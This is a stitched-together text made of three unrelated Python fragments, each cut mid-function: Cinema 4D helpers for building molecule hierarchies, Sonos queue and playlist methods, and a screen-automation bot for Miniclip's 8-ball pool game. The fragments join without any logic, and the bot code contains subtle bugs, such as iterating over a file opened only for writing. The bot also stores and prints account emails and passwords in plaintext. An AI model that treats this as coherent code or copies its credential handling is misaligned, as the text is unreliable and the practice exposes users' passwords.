tmp=name.split("_")
if len(tmp) == 1 : #molname
hiearchy=name.split(":")
if len(hiearchy) == 1 : return [name,""]
else : return hiearchy
else :
hiearchy=tmp[1].split(":") #B_MOL:CHAIN:RESIDUE:ATOMS
return hiearchy
#def get_editor_object_camera(doc):
# bd = doc.get_render_basedraw()
# cp = bd.get_scene_camera(doc)
# if cp is None: cp = bd.get_editor_camera()
# return cp
def getCurrentScene():
return c4d.documents.GetActiveDocument()
def update():
#getCurrentScene().GeSyncMessage(c4d.MULTIMSG_UP)
getCurrentScene().Message(c4d.MULTIMSG_UP)
c4d.DrawViews(c4d.DA_ONLY_ACTIVE_VIEW|c4d.DA_NO_THREAD|c4d.DA_NO_ANIMATION)
c4d.DrawViews(c4d.DA_NO_THREAD|c4d.DA_FORCEFULLREDRAW)
updateAppli = update
def getObjectName(o):
return o.GetName()
def getObject(name):
obj=None
if type(name) != str : return name
try :
obj=getCurrentScene().SearchObject(name)
except :
obj=None
return obj
def deleteObject(obj):
sc = getCurrentScene()
try :
print obj.GetName()
sc.SetActiveObject(obj)
c4d.CallCommand(100004787) #delete the obj
except:
print "problem deleting ", obj
def newEmpty(name,location=None,parentCenter=None,display=0,visible=0):
empty=c4d.BaseObject(c4d.Onull)
empty.SetName(name)
empty[1000] = display
empty[1001] = 1.0
if location != None :
if parentCenter != None :
location = location - parentCenter
empty.SetPos(c4dv(location))
return empty
def newInstance(name,object,location=None,c4dmatrice=None,matrice=None):
instance = c4d.BaseObject(INSTANCE)
instance[1001]=object
instance.SetName(name)#.replace(":","_")
if location != None :
instance.SetPos(c4dv(location))
if c4dmatrice !=None :
#type of matrice
instance.SetMg(c4dmatrice)
if matrice != None:
mx = matrix2c4dMat(matrice)
instance.SetMg(mx)
return instance
def setObjectMatrix(object,matrice,c4dmatrice=None):
if c4dmatrice !=None :
#type of matrice
object.SetMg(c4dmatrice)
else :
mx = matrix2c4dMat(matrice,transpose=False)
object.SetMg(mx)
def concatObjectMatrix(object,matrice,c4dmatrice=None,local=True):
#local or global?
cmg = object.GetMg()
cml = object.GetMl()
if c4dmatrice !=None :
#type of matrice
if local :
object.SetMl(cml*c4dmatrice)
else :
object.SetMg(cmg*c4dmatrice)
else :
mx = matrix2c4dMat(matrice,transpose=False)
if local :
object.SetMl(cml*mx)
else :
object.SetMg(cmg*mx)
def getPosUntilRoot(obj):
stop = False
parent = obj.GetUp()
pos=c4d.Vector(0.,0.,0.)
while not stop :
pos = pos + parent.GetPos()
parent = parent.GetUp()
if parent is None :
stop = True
return pos
def addObjectToScene(doc,obj,parent=None,centerRoot=True,rePos=None):
#doc.start_undo()
if getObject(obj.GetName()) == None:
if parent != None :
if type(parent) == str : parent = getObject(parent)
doc.InsertObject(obj,parent=parent)
if centerRoot :
currentPos = obj.GetPos()
if rePos != None :
parentPos = c4dv(rePos)
else :
parentPos = getPosUntilRoot(obj)#parent.GetPos()
obj.SetPos(currentPos-parentPos)
else : doc.InsertObject(obj)
#add undo support
#doc.add_undo(c4d.UNDO_NEW, obj)
#doc.end_undo()
def AddObject(obj,parent=None,centerRoot=True,rePos=None):
doc = getCurrentScene()
#doc.start_undo()
if parent != None :
if type(parent) == str : parent = getObject(parent)
doc.InsertObject(obj,parent=parent)
if centerRoot :
currentPos = obj.GetPos()
if rePos != None :
parentPos = c4dv(rePos)
else :
parentPos = getPosUntilRoot(obj)#parent.GetPos()
obj.SetPos(currentPos-parentPos)
else : doc.InsertObject(obj)
def addObjToGeom(obj,geom):
if type(obj) == list or type(obj) == tuple:
if len(obj) > 2: geom.obj=obj
elif len(obj) == 1: geom.obj=obj[0]
elif len(obj) == 2:
geom.mesh=obj[1]
geom.obj=obj[0]
else : geom.obj=obj
def makeHierarchy(listObj,listName, makeTagIK=False):
for i,name in enumerate(listName) :
o = getObject(listObj[name])
if makeTagIK :
o.MakeTag(IK)
if i < len(listObj)-1 :
child = getObject(listObj[listName[i+1]])
child.InsertUnder(o)
def addIKTag(object):
object.MakeTag(IK)
def makeAtomHierarchy(res,parent,useIK=False):
doc = getCurrentScene()
backbone = res.backbone()
sidechain = res.sidechain()
for i,atm in enumerate(backbone):
rePos = None
prev_atom = None
at_center = atm.coords
at_obj = newEmpty(atm.full_name(),location=at_center)
bond_obj = newEmpty(atm.full_name()+"_bond")
if useIK :
addIKTag(at_obj)
addIKTag(bond_obj)
if i > 0 : prev_atom = backbone[i-1]
if prev_atom != None:
if VERBOSE : print "hierarchy backbone ",atm.name, prev_atom.name
rePos = prev_atom.coords
oparent = getObject(prev_atom.full_name()+"_bond")
if VERBOSE : print oparent.GetName()
addObjectToScene(doc,at_obj,parent=oparent,centerRoot=True,rePos=rePos)
else :
if VERBOSE : print "first atom", atm.name
addObjectToScene(doc,at_obj,parent=parent,centerRoot=True,rePos=rePos)
addObjectToScene(doc,bond_obj,parent=at_obj,centerRoot=False)
if atm.name == 'CA' :
#add the sidechain child of CA
side_obj = newEmpty(atm.full_name()+"_sidechain")
addObjectToScene(doc,side_obj,parent=at_obj,centerRoot=False)
for j,satm in enumerate(sidechain):
sat_center = satm.coords
sat_obj = newEmpty(satm.full_name(),location=sat_center)
sbond_obj = newEmpty(satm.full_name()+"_sbond")
addObjectToScene(doc,sat_obj,parent=side_obj,centerRoot=True,rePos=at_center)
addObjectToScene(doc,sbond_obj,parent=side_obj,centerRoot=False)
if useIK :
return bond_obj
else :
return parent
def makeResHierarchy(res,parent,useIK=False):
sc = getCurrentScene()
res_center = res.atoms.get("CA").coords[0]#or averagePosition of the residues?
res_obj = newEmpty(res.full_name(),location=res_center)
bond_obj = newEmpty(res.full_name()+"_bond")
rePos = None
prev_res = res.getPrevious()
if useIK :
addIKTag(res_obj)
if prev_res != None and useIK :
rePos = prev_res.atoms.get("CA").coords[0]
oparent = getObject(prev_res.full_name())
addObjectToScene(sc,res_obj,parent=oparent,centerRoot=True,rePos=rePos)
else :
addObjectToScene(sc,res_obj,parent=parent,centerRoot=True,rePos=rePos)
addObjectToScene(sc,bond_obj,parent=res_obj,centerRoot=False)
#mol.geomContainer.masterGeom.res_obj[res.name]=util.getObjectName(res_obj)
return res_obj
def addCameraToScene(name,Type,focal,center,sc):
cam = c4d.BaseObject(CAMERA)
cam.SetName(name)
cam.SetPos(c4dv(center))
    cam[1001] = 1 # 0:perspective, 1:parallel
    cam[1000] = float(focal) # parallel zoom
    cam[1006] = 2*float(focal) # perspective focal
#rotation?
cam[904,1000] = pi/2.
addObjectToScene(sc,cam,centerRoot=False)
def addLampToScene(name,Type,rgb,dist,energy,soft,shadow,center,sc):
    # type of light 0:omni, 1:spot, 2:squarespot, 3:infinite, 4:parallel,
    # 5:parallel spot, 6:square parallel spot, 8:area
#light sun type is an infinite light with a sun tag type
dicType={'Area':0,'Sun':3}
lamp = c4d.BaseObject(LIGHT)
lamp.SetName(name)
lamp.SetPos(c4dv(center))
lamp[904,1000] = pi/2.
lamp[90000]= c4d.Vector(float(rgb[0]), float(rgb[1]), float(rgb[2]))#color
lamp[90001]= float(energy) #intensity
lamp[90002]= dicType[Type] #type
    if shadow : lamp[90003] = 1 # soft shadow map
if Type == "Sun":
suntag = lamp.MakeTag(SUNTAG)
addObjectToScene(sc,lamp,centerRoot=False)
"""
lampe.setDist(dist)
lampe.setSoftness(soft)
"""
def reparent(obj,parent):
obj.InsertUnder(parent)
def setInstance(name,object,location=None,c4dmatrice=None,matrice=None):
instance = c4d.BaseObject(INSTANCE)
instance[1001]=object
instance.SetName(name)#.replace(":","_")
if location != None :
instance.SetPos(c4dv(location))
if c4dmatrice !=None :
        # a c4d matrix was given directly
instance.SetMg(c4dmatrice)
if matrice != None:
mx = matrix2c4dMat(matrice)
instance.SetMl(mx)
p = instance.GetPos()
instance.SetPos(c4d.Vector(p.y,p.z,p.x))
return instance
def translateObj(obj,position,use_parent=True):
if len(position) == 1 : c = position[0]
else : c = position
#print "upadteObj"
newPos=c4dv(c)
if use_parent :
parentPos = getPosUntilRoot(obj)#parent.GetPos()
newPos = newPos - parentPos
obj.SetPos(newPos)
else :
pmx = obj.GetMg()
mx = c4d.Matrix()
mx.off = pmx.off + c4dv(position)
obj.SetMg(mx)
def scaleObj(obj,sc):
if type(sc) is float :
sc = [sc,sc,sc]
obj.SetScale(c4dv(sc))
def rotateObj(obj,rot):
    # rot is expected in radians (C4D rotation channels store radians)
obj[sy.ID_BASEOBJECT_ROTATION, sy.VECTOR_X]=float(rot[0])
obj[sy.ID_BASEOBJECT_ROTATION, sy.VECTOR_Y]=float(rot[1])
obj[sy.ID_BASEOBJECT_ROTATION, sy.VECTOR_Z]=float(rot[2])
def toggleDisplay(obj,display):
if display : obj.SetEditorMode(c4d.MODE_UNDEF)
else : obj.SetEditorMode(c4d.MODE_OFF)
if display : obj.SetRenderMode(c4d.MODE_UNDEF)
else : obj.SetRenderMode(c4d.MODE_OFF)
if display : obj[906]=1
else : obj[906]=0
def findatmParentHierarchie(atm,indice,hiera):
    # fix the problem where the mol name has an "_"
if indice == "S" : n='cpk'
else : n='balls'
mol=atm.getParentOfType(Protein)
hierarchy=parseObjectName(indice+"_"+atm.full_name())
if hiera == 'perRes' :
parent = getObject(mol.geomContainer.masterGeom.res_obj[hierarchy[2]])
elif hiera == 'perAtom' :
        if atm.name in backbone :
parent = getObject(atm.full_name()+"_bond")
else :
parent = getObject(atm.full_name()+"_sbond")
else :
ch = atm.getParentOfType(Chain)
parent=getObject(mol.geomContainer.masterGeom.chains_obj[ch.name+"_"+n])
return parent
#####################MATERIALS FUNCTION########################
def addMaterial(name,color):
import c4d
import c4d.documents
doc = c4d.documents.GetActiveDocument()
# create standard material
__mat = doc.SearchMaterial(name)
    if VERBOSE :
                ("RequestedCount", 1),
("SortCriteria", ""),
]
)
dom = XML.fromstring(really_utf8(response["Result"]))
queue_size = None
container = dom.find("{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}container")
if container is not None:
child_count = container.get("childCount")
if child_count is not None:
queue_size = int(child_count)
return queue_size
def get_sonos_playlists(self, *args, **kwargs):
"""Convenience method for calling
        ``soco.music_library.get_music_library_information('sonos_playlists')``.
        Refer to the docstring for that method: `get_music_library_information`.
"""
args = tuple(["sonos_playlists"] + list(args))
return self.music_library.get_music_library_information(*args, **kwargs)
@only_on_master
def add_uri_to_queue(self, uri, position=0, as_next=False):
"""Add the URI to the queue.
For arguments and return value see `add_to_queue`.
"""
# FIXME: The res.protocol_info should probably represent the mime type
# etc of the uri. But this seems OK.
res = [DidlResource(uri=uri, protocol_info="x-rincon-playlist:*:*:*")]
item = DidlObject(resources=res, title="", parent_id="", item_id="")
return self.add_to_queue(item, position, as_next)
@only_on_master
def add_to_queue(self, queueable_item, position=0, as_next=False):
"""Add a queueable item to the queue.
Args:
queueable_item (DidlObject or MusicServiceItem): The item to be
added to the queue
position (int): The index (1-based) at which the URI should be
added. Default is 0 (add URI at the end of the queue).
as_next (bool): Whether this URI should be played as the next
track in shuffle mode. This only works if ``play_mode=SHUFFLE``.
Returns:
int: The index of the new item in the queue.
"""
metadata = to_didl_string(queueable_item)
response = self.avTransport.AddURIToQueue(
[
("InstanceID", 0),
("EnqueuedURI", queueable_item.resources[0].uri),
("EnqueuedURIMetaData", metadata),
("DesiredFirstTrackNumberEnqueued", position),
("EnqueueAsNext", int(as_next)),
]
)
qnumber = response["FirstTrackNumberEnqueued"]
return int(qnumber)
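    # Usage sketch (illustrative; ``device`` stands for a SoCo instance and
    # the URI is made up). The returned queue position is 1-based:
    #
    #   index = device.add_uri_to_queue("x-file-cifs://server/share/track.mp3")
    #   print("enqueued as queue item {}".format(index))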
def add_multiple_to_queue(self, items, container=None):
"""Add a sequence of items to the queue.
Args:
            items (list): A sequence of items to be added to the queue
container (DidlObject, optional): A container object which
includes the items.
"""
if container is not None:
container_uri = container.resources[0].uri
container_metadata = to_didl_string(container)
else:
container_uri = "" # Sonos seems to accept this as well
container_metadata = "" # pylint: disable=redefined-variable-type
chunk_size = 16 # With each request, we can only add 16 items
item_list = list(items) # List for slicing
for index in range(0, len(item_list), chunk_size):
chunk = item_list[index : index + chunk_size]
uris = " ".join([item.resources[0].uri for item in chunk])
uri_metadata = " ".join([to_didl_string(item) for item in chunk])
self.avTransport.AddMultipleURIsToQueue(
[
("InstanceID", 0),
("UpdateID", 0),
("NumberOfURIs", len(chunk)),
("EnqueuedURIs", uris),
("EnqueuedURIsMetaData", uri_metadata),
("ContainerURI", container_uri),
("ContainerMetaData", container_metadata),
("DesiredFirstTrackNumberEnqueued", 0),
("EnqueueAsNext", 0),
]
)
@only_on_master
def remove_from_queue(self, index):
"""Remove a track from the queue by index. The index number is
required as an argument, where the first index is 0.
Args:
index (int): The (0-based) index of the track to remove
"""
# TODO: what do these parameters actually do?
updid = "0"
objid = "Q:0/" + str(index + 1)
self.avTransport.RemoveTrackFromQueue(
[
("InstanceID", 0),
("ObjectID", objid),
("UpdateID", updid),
]
)
@only_on_master
def clear_queue(self):
"""Remove all tracks from the queue."""
self.avTransport.RemoveAllTracksFromQueue(
[
("InstanceID", 0),
]
)
@deprecated("0.13", "soco.music_library.get_favorite_radio_shows", "0.15", True)
def get_favorite_radio_shows(self, start=0, max_items=100):
"""Get favorite radio shows from Sonos' Radio app.
Returns:
dict: A dictionary containing the total number of favorites, the
number of favorites returned, and the actual list of favorite radio
shows, represented as a dictionary with ``'title'`` and ``'uri'``
keys.
        Depending on what you're building, you'll want to check whether the
        total number of favorites is greater than the amount you requested
        (``max_items``); if it is, use ``start`` to page through and fetch
        the entire list of favorites.
"""
message = (
"The output type of this method will probably change in "
"the future to use SoCo data structures"
)
warnings.warn(message, stacklevel=2)
return self.__get_favorites(RADIO_SHOWS, start, max_items)
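    # Paging sketch (illustrative; ``device`` is assumed to be a SoCo
    # instance): ``total`` can exceed ``returned``, so advance ``start`` until
    # every favorite has been fetched.
    #
    #   start, shows = 0, []
    #   while True:
    #       page = device.get_favorite_radio_shows(start=start, max_items=100)
    #       shows.extend(page["favorites"])
    #       start += page["returned"]
    #       if start >= int(page["total"]):
    #           break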
@deprecated("0.13", "soco.music_library.get_favorite_radio_stations", "0.15", True)
def get_favorite_radio_stations(self, start=0, max_items=100):
"""Get favorite radio stations from Sonos' Radio app.
See :meth:`get_favorite_radio_shows` for return type and remarks.
"""
message = (
"The output type of this method will probably change in "
"the future to use SoCo data structures"
)
warnings.warn(message, stacklevel=2)
return self.__get_favorites(RADIO_STATIONS, start, max_items)
@deprecated("0.13", "soco.music_library.get_sonos_favorites", "0.15", True)
def get_sonos_favorites(self, start=0, max_items=100):
"""Get Sonos favorites.
See :meth:`get_favorite_radio_shows` for return type and remarks.
"""
message = (
"The output type of this method will probably change in "
"the future to use SoCo data structures"
)
warnings.warn(message, stacklevel=2)
return self.__get_favorites(SONOS_FAVORITES, start, max_items)
def __get_favorites(self, favorite_type, start=0, max_items=100):
"""Helper method for `get_favorite_radio_*` methods.
Args:
            favorite_type (str): Specify either `RADIO_STATIONS` or
                `RADIO_SHOWS`; any other value falls back to `SONOS_FAVORITES`.
start (int): Which number to start the retrieval from. Used for
paging.
max_items (int): The total number of results to return.
"""
if favorite_type not in (RADIO_SHOWS, RADIO_STATIONS):
favorite_type = SONOS_FAVORITES
response = self.contentDirectory.Browse(
[
(
"ObjectID",
"FV:2"
if favorite_type is SONOS_FAVORITES
else "R:0/{0}".format(favorite_type),
),
("BrowseFlag", "BrowseDirectChildren"),
("Filter", "*"),
("StartingIndex", start),
("RequestedCount", max_items),
("SortCriteria", ""),
]
)
result = {}
favorites = []
results_xml = response["Result"]
if results_xml != "":
# Favorites are returned in DIDL-Lite format
metadata = XML.fromstring(really_utf8(results_xml))
for item in metadata.findall(
"{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}container"
if favorite_type == RADIO_SHOWS
else "{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}item"
):
favorite = {}
favorite["title"] = item.findtext(
"{http://purl.org/dc/elements/1.1/}title"
)
favorite["uri"] = item.findtext(
"{urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/}res"
)
if favorite_type == SONOS_FAVORITES:
favorite["meta"] = item.findtext(
"{urn:schemas-rinconnetworks-com:metadata-1-0/}resMD"
)
favorites.append(favorite)
result["total"] = response["TotalMatches"]
result["returned"] = len(favorites)
result["favorites"] = favorites
return result
def create_sonos_playlist(self, title):
"""Create a new empty Sonos playlist.
Args:
title: Name of the playlist
:rtype: :py:class:`~.soco.data_structures.DidlPlaylistContainer`
"""
response = self.avTransport.CreateSavedQueue(
[
("InstanceID", 0),
("Title", title),
("EnqueuedURI", ""),
("EnqueuedURIMetaData", ""),
]
)
item_id = response["AssignedObjectID"]
obj_id = item_id.split(":", 2)[1]
uri = "file:///jffs/settings/savedqueues.rsq#{0}".format(obj_id)
res = [DidlResource(uri=uri, protocol_info="x-rincon-playlist:*:*:*")]
return DidlPlaylistContainer(
resources=res, title=title, parent_id="SQ:", item_id=item_id
)
@only_on_master
# pylint: disable=invalid-name
def create_sonos_playlist_from_queue(self, title):
"""Create a new Sonos playlist from the current queue.
Args:
title: Name of the playlist
:rtype: :py:class:`~.soco.data_structures.DidlPlaylistContainer`
"""
# Note: probably same as Queue service method SaveAsSonosPlaylist
# but this has not been tested. This method is what the
# controller uses.
response = self.avTransport.SaveQueue(
[("InstanceID", 0), ("Title", title), ("ObjectID", "")]
)
item_id = response["AssignedObjectID"]
obj_id = item_id.split(":", 2)[1]
uri = "file:///jffs/settings/savedqueues.rsq#{0}".format(obj_id)
res = [DidlResource(uri=uri, protocol_info="x-rincon-playlist:*:*:*")]
return DidlPlaylistContainer(
resources=res, title=title, parent_id="SQ:", item_id=item_id
)
@only_on_master
def remove_sonos_playlist(self, sonos_playlist):
"""Remove a Sonos playlist.
Args:
sonos_playlist (DidlPlaylistContainer): Sonos playlist to remove
or the item_id (str).
Returns:
            bool: True if successful, False otherwise
Raises:
SoCoUPnPException: If sonos_playlist does not point to a valid
object.
"""
object_id = getattr(sonos_playlist, "item_id", sonos_playlist)
return self.contentDirectory.DestroyObject([("ObjectID", object_id)])
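    # Usage sketch (illustrative; ``device`` is a SoCo instance): either the
    # playlist container or its ``item_id`` string is accepted, thanks to the
    # ``getattr`` fallback above.
    #
    #   playlist = device.get_sonos_playlists()[0]
    #   device.remove_sonos_playlist(playlist)          # by object
    #   device.remove_sonos_playlist(playlist.item_id)  # or by id string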
def add_item_to_sonos_playlist(self, queueable_item, sonos_playlist):
"""Adds a queueable item to a Sonos' playlist.
Args:
queueable_item (DidlObject): the item to add to the Sonos' playlist
sonos_playlist (DidlPlaylistContainer): the Sonos' playlist to
which the item should be added
"""
# Get the update_id for the playlist
response, _ = self.music_library._music_lib_search(sonos_playlist.item_id, 0, 1)
update_id = response["UpdateID"]
# Form the metadata for queueable_item
metadata = to_didl_string(queueable_item)
# Make the request
self.avTransport.AddURIToSavedQueue(
[
("InstanceID", 0),
("UpdateID", update_id),
("ObjectID", sonos_playlist.item_id),
("EnqueuedURI", queueable_item.resources[0].uri),
("EnqueuedURIMetaData", metadata),
                # 2 ** 32 - 1 = 4294967295. This field always has this value;
                # most likely playlist positions are represented as a 32-bit
                # uint, making this the largest possible index. Asking to add
                # at this index therefore amounts to adding "at the end".
("AddAtIndex", 4294967295),
]
)
@only_on_master
def set_sleep_timer(self, sleep_time_seconds):
"""Sets the sleep timer.
Args:
sleep_time_seconds (int or NoneType): How long to wait before
                turning off the speaker, in seconds; None cancels a sleep
                timer. Maximum value is 86399.
Raises:
SoCoException: Upon errors interacting with Sonos controller
ValueError: Argument/Syntax errors
"""
        # Note: A value of None for sleep_time_seconds is valid, and must be
        # kept distinct from 0. 0 means go to sleep now, which immediately
        # starts the sound tapering and can be a useful feature, while None
        # means cancel the current timer.
try:
if sleep_time_seconds is None:
sleep_time = ""
else:
sleep_time = format(datetime.timedelta(seconds=int(sleep_time_seconds)))
self.avTransport.ConfigureSleepTimer(
[
("InstanceID", 0),
("NewSleepTimerDuration", sleep_time),
]
)
except SoCoUPnPException as err:
if "Error 402 received" in str(err):
raise ValueError(
"invalid sleep_time_seconds, must be integer \
value between 0 and 86399 inclusive or None"
) from err
raise
except ValueError as error:
raise ValueError(
"invalid sleep_time_seconds, must be integer \
value between 0 and 86399 inclusive or None"
) from error
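    # Usage sketch (illustrative; ``device`` is a SoCo instance):
    #
    #   device.set_sleep_timer(15 * 60)  # fall asleep in 15 minutes
    #   device.set_sleep_timer(0)        # sleep now (starts the fade-out)
    #   device.set_sleep_timer(None)     # cancel the current timer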
@only_on_master
def get_sleep_timer(self):
"""Retrieves remaining sleep time, if any
import json
import sys
import time
import webbrowser
import uuid
import subprocess as sub
from win32api import GetSystemMetrics
import pyautogui
import requests
import game
import utils
import constants
class Bot:
miniclipURL = "https://www.miniclip.com/games/8-ball-pool-multiplayer/en/focus/"
def __init__(self):
self.name = self.uuidGenerator()
self.height = None
self.width = None
self.gameWindow = None
def uuidGenerator(self):
stringLength = 8
randomString = uuid.uuid4().hex
randomString = randomString.lower()[0:stringLength]
return randomString
def gameMenuSearch(self, r):
imgs = [constants.img_alreadyStarted, constants.img_alreadyStarted1]
utils.debugPrint("Checking for Game Menu...")
r += 1
for img in imgs:
utils.debugPrint("Image {}...".format(img))
for i in range(0, r + 1):
pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("Attempts: " + str(r - i))
self.dismiss(1)
time.sleep(.5)
else:
return True
return False
def dismiss(self, r):
imgs = [constants.img_cueUpdate, constants.img_cues, constants.img_backButton]
utils.debugPrint("Checking for cue notification.")
r += 1
for img in imgs:
utils.debugPrint("Image {}...".format(img))
for i in range(0, r + 1):
                pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("Attempts: " + str(r-i))
time.sleep(.1)
else:
return True
def click(self, img, gameWindow):
for i in range(0, 5):
if gameWindow is None:
pos = utils.imageSearch(img)
else:
pos = utils.imageSearch(img, gameWindow)
if pos is None:
continue
else:
pyautogui.click(pos)
utils.debugPrint("{} found and clicked.".format(img))
time.sleep(.5)
break
def start(self):
uuid = self.uuidGenerator()
print("Bot {} beginning setup.".format(uuid))
# Checks if webpage still present
result = utils.CheckForUrl(5)
if result is False:
nWin = utils.timedInput("Did not detect website. Open new tab/window? Press CTRL+C to begin typing.")
if nWin is True:
webbrowser.open(Bot.miniclipURL)
time.sleep(5)
self.start()
else:
print("Exiting..")
sys.exit()
else:
# webpage is still visible
login = self.ifLogin()
if login is None:
utils.debugPrint("Error confirming login status. Waiting 10 seconds and attempting once more.")
time.sleep(10)
login = self.ifLogin()
if login is None:
utils.debugPrint("Login systems failed. Cannot proceed.\nExiting..")
time.sleep(2)
sys.exit()
# login status confirmed, either logged in or not
# if login is None, exits. login is either True or False
gameReg = self.getGameRegion(login)
if gameReg is False or gameReg is None:
utils.debugPrint("Error acquiring game region. Waiting 10 seconds and attempting once more.")
time.sleep(10)
gameReg = self.getGameRegion(login)
if gameReg is False:
utils.debugPrint("Acquisition of game region failed. Cannot proceed.\nExiting..")
time.sleep(2)
sys.exit()
# game region successfully acquired
if login is False:
# user not logged in, navigate menu that only shows for users not logged in
nM = self.navigateMenu(login)
if nM is False:
# play as guest
self.playPoolGame()
else:
# log in and play game
self.logIn()
time.sleep(.5)
#self.spinWin(5)
#self.collectCoins(5)
dG = self.decideGame(5)
if dG is False:
utils.debugPrint("Game choice not made. Cannot proceed.\nExiting..")
time.sleep(2)
sys.exit()
else:
play = self.playPoolGame()
if play is True:
while play is True:
pA = utils.timedInput("Play another game? Press CTRL+C to begin typing.", 15)
if pA is True:
play = self.playPoolGame()
else:
utils.debugPrint("Exiting..")
time.sleep(2)
sys.exit()
utils.debugPrint("Terminating Bot..")
time.sleep(3)
sys.exit()
def ifLogin(self):
limit = 30
utils.debugPrint("Checking to see if already logged in.")
loggedIn = self.loginCheck()
while loggedIn is None and limit > 0:
utils.debugPrint("Did not find URL.\nRetrying..")
time.sleep(1)
limit -= 1
loggedIn = self.loginCheck()
if loggedIn is None:
return None
utils.debugPrint("loginCheck succeeded.")
return True
def loginCheck(self):
imgs = [constants.img_allowFlash, constants.img_allowFlash1, constants.img_allowFlash2, constants.img_allow]
time.sleep(1)
loggedIn = utils.CheckForUrl(5)
if loggedIn is False:
print("Could not identify visible tab. Opening new tab.")
webbrowser.open(Bot.miniclipURL)
return None
else:
for img in imgs:
utils.debugPrint("Searching for image {}...".format(img))
pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("{} not detected.".format(img))
continue
else:
self.click(img, self.gameWindow)
if img == constants.img_allowFlash or img == constants.img_allowFlash1:
for i, v in enumerate(imgs):
if 3 >= i >= 2:
p = utils.imageSearch(v)
if p is None:
utils.debugPrint("{} not detected.".format(v))
return None
else:
                                    self.click(v, self.gameWindow)
continue
imgs = [constants.img_signUpLogin, constants.img_defaultAcct]
for img in imgs:
utils.debugPrint("Searching for image {}...".format(img))
for i in range(0, 5):
pos = utils.imageSearch(img)
if pos is None:
utils.debugPrint("{} not detected.".format(img))
continue
else:
if img == constants.img_signUpLogin:
utils.debugPrint("User not logged in.")
return False
if img == constants.img_defaultAcct:
utils.debugPrint("Logged into default account.")
return True
loggedIn = utils.CheckForUrl(5)
if loggedIn is False:
return None
else:
utils.debugPrint("Correct tab still visible.")
account = utils.timedInput("Are you logged into your own account? Press CTRL+C to begin typing.")
if account is False:
utils.debugPrint("User not logged into their own account and default account not detected.")
return None
else:
utils.debugPrint("User logged into their own account.")
default = utils.timedInput("Would you like to save it as the default?")
if default is False:
utils.debugPrint("User using account other than default.")
print("Proceeding...")
return True
else:
utils.debugPrint("Saving new account as default.")
reg = utils.imageSearch(constants.img_facebookLogo)
pyautogui.screenshot("images/" + constants.img_defaultAcct,
region=((reg[0] + reg[2]) - 170, reg[1], 170, 40))
utils.debugPrint("Overwriting pre-existing image of default account.")
while True:
newemail = input("Please enter the email associated with the account.")
newpass = input("Please enter the password associated with the account.")
confirm = utils.timedInput("User is {} and the password is {}?".format(newemail, newpass))
if confirm is True:
with open("default.txt", "w") as f:
for line in f:
if line is None:
utils.debugPrint("Default username file is empty.")
else:
utils.debugPrint("Overwriting pre-existing contents.")
f.write("{} {}".format(newemail, newpass))
print("New default account set. {}:{}".format(newemail, newpass))
f.close()
return True
def getGameRegion(self, loginTruthVal):
limit = 3
self.height, self.width = self.miniclipAPI()
utils.debugPrint("Size of game window retrieved.")
time.sleep(1)
self.clickX()
utils.debugPrint("Searching for top right of game window.")
gM = self.gameMenuSearch(5)
if gM is False:
result = utils.CheckForUrl(5)
if result is True:
proceed = utils.timedInput("Game menu not found. Proceed anyway? Press CTRL+C to begin typing.")
if proceed is True:
utils.debugPrint("Proceeding..")
return False
else:
utils.debugPrint("Backing out..")
return None
else:
proceed = utils.timedInput(
"Game menu not found. Webpage not found. Open new tab/window? Press CTRL+C to begin typing.")
if proceed is True:
utils.debugPrint("Opening new tab..")
webbrowser.open(Bot.miniclipURL)
time.sleep(5)
self.start()
else:
utils.debugPrint("Backing out..")
return None
utils.debugPrint("Game menu found.")
if loginTruthVal is False:
utils.debugPrint("User not logged in.")
time.sleep(1)
utils.debugPrint("Searching for game region..")
cor = self.searchForGameCorner(constants.img_topRightCorner, 20)
if cor is True:
return True
if limit > 0:
utils.debugPrint("{} tries left.".format(limit))
else:
return False
else:
utils.debugPrint("User logged in.")
time.sleep(1)
utils.debugPrint("Searching for game region..")
cor = self.searchForGameCorner(constants.img_topRightCornerLogged, 20)
if cor is True:
return True
if limit > 0:
utils.debugPrint("{} tries left.".format(limit))
else:
return False
def miniclipAPI(self):
utils.debugPrint("Accessing miniclip's API.")
api_url_base = "https://webmasters.miniclip.com/api/"
api_url = "{0}/games/2471/en.json".format(api_url_base)
try:
response = requests.get(api_url)
utils.debugPrint("Requesting connection.")
if response.status_code == 200:
utils.debugPrint("Connection accepted.")
data = json.loads(response.content.decode("utf-8"))
h = int(data["2471"].get("height"))
w = int(data["2471"].get("width"))
return h, w
        except requests.exceptions.ConnectionError:
            utils.debugPrint("Connection refused. Retrying up to 5 times.")
            for i in range(5):
                time.sleep(1)
                try:
                    response = requests.get(api_url)
                except requests.exceptions.ConnectionError:
                    continue
                if response.status_code == 200:
                    data = json.loads(response.content.decode("utf-8"))
                    h = int(data["2471"].get("height"))
                    w = int(data["2471"].get("width"))
                    return h, w
def searchForGameCorner(self, img, attempts):
reg = pyautogui.locateOnScreen(utils.imagePath(img))
if reg is not None:
topRX = reg[0] + reg[2]
topRY = reg[1]
self.gameWindow = (topRX - self.width, topRY, self.width, self.height)
utils.debugPrint("Region acquired." + str(self.gameWindow))
return True
else:
utils.debugPrint("Region not found. Attempting {} more times.".format(attempts))
#self.spinWin()
#self.clickX()
while attempts > 0:
reg = pyautogui.locateOnScreen(utils.imagePath(img))
if reg is None:
utils.debugPrint("Attempts: " + str(attempts))
attempts -= 1
elif reg is not None:
topRX = reg[0] + reg[2]
topRY = reg[1]
self.gameWindow = (topRX - self.width, topRY, self.width, self.height)
utils.debugPrint("Region acquired." + str(self.gameWindow))
return True
return False
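    # Region sketch (illustrative): pyautogui regions are (left, top, width,
    # height) tuples, so locating the top-right corner image pins the whole
    # game window for later screenshots and searches:
    #
    #   left, top = topRX - self.width, topRY
    #   pyautogui.screenshot("window.png",
    #                        region=(left, top, self.width, self.height))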
def navigateMenu(self, truthVal):
pos = utils.imageSearch(constants.img_loginWithMiniclip, self.gameWindow)
pos1 = utils.imageSearch(constants.img_playButtonGuest, self.gameWindow)
if pos is None and pos1 is None:
utils.debugPrint("Cannot find play buttons.\nRefreshing page.")
self.refreshPage()
utils.debugPrint("Attempting to renavigate menu.")
self.navigateMenu(truthVal)
else:
utils.debugPrint("Found play buttons.")
